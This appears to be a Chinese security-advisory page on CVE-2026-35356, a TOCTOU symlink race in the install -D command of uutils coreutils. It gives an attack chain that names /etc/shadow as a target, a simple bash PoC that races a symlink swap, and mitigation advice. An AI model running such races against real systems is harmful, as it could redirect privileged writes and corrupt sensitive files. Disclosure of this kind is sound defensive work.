IPBUF安全漏洞报告
English
CVE-2026-35356 CVSS 6.3 中危

CVE-2026-35356: uutils coreutils TOCTOU漏洞

披露日期: 2026-04-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35356
漏洞类型
TOCTOU竞争条件
CVSS评分
6.3 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
uutils coreutils

相关标签

TOCTOU竞态条件uutilscoreutils本地漏洞

漏洞概述

uutils coreutils的install工具在使用-D标志时存在TOCTOU漏洞。程序在创建父目录后,第二次解析路径创建目标文件时未锚定到目录文件描述符。拥有并发写入权限的攻击者可在操作间隙将路径组件替换为符号链接,将特权写入重定向到任意位置。

技术细节

该漏洞源于install命令在处理-D参数时的逻辑缺陷。当执行install -D时,程序首先检查并创建父目录,随后再次解析路径以创建目标文件。由于这两个步骤之间缺乏原子性保护(如未使用O_PATH或类似文件描述符锚定机制),攻击者可在本地利用并发写入权限,在极短的时间窗口内将中间路径替换为指向敏感文件(如/etc/shadow)的符号链接。这导致原本应写入普通目录的内容被写入敏感位置,从而破坏系统完整性(I:H)和可用性(A:H)。

攻击链分析

STEP 1
1. 环境准备
攻击者确认目标系统使用存在漏洞的uutils coreutils版本,并拥有对相关路径的并发写入权限。
STEP 2
2. 触发竞态
当管理员或脚本执行带有-D参数的install命令时,攻击者利用竞态窗口,将父目录路径组件替换为符号链接。
STEP 3
3. 重定向写入
install命令在第二次路径解析时跟随符号链接,将文件内容写入攻击者指定的任意文件系统位置。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-35356 # This script demonstrates the race condition. TARGET_DIR="/tmp/vuln_target" SYMLINK_TARGET="/tmp/evil_payload" mkdir -p "$TARGET_DIR" # Attacker process in background ( while true; do rm -rf "$TARGET_DIR" ln -s "$SYMLINK_TARGET" "$TARGET_DIR" done ) & ATTACKER_PID=$! # Victim process (simulating install -D) for i in {1..100}; do # Simulating: install -D source /tmp/vuln_target/file.txt # In a real scenario, this triggers the vulnerable binary touch "$TARGET_DIR/file.txt" 2>/dev/null && echo "Success" && break sleep 0.01 done kill $ATTACKER_PID if [ -L "$TARGET_DIR" ]; then echo "[+] Exploit likely successful: Symlink replaced directory" else echo "[-] Exploit failed" fi

影响范围

uutils coreutils < 0.7.0

防御指南

临时缓解措施
在未升级补丁前,应避免在低权限用户可访问的目录下使用install -D命令,并严格控制目录权限以防止符号链接替换攻击。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表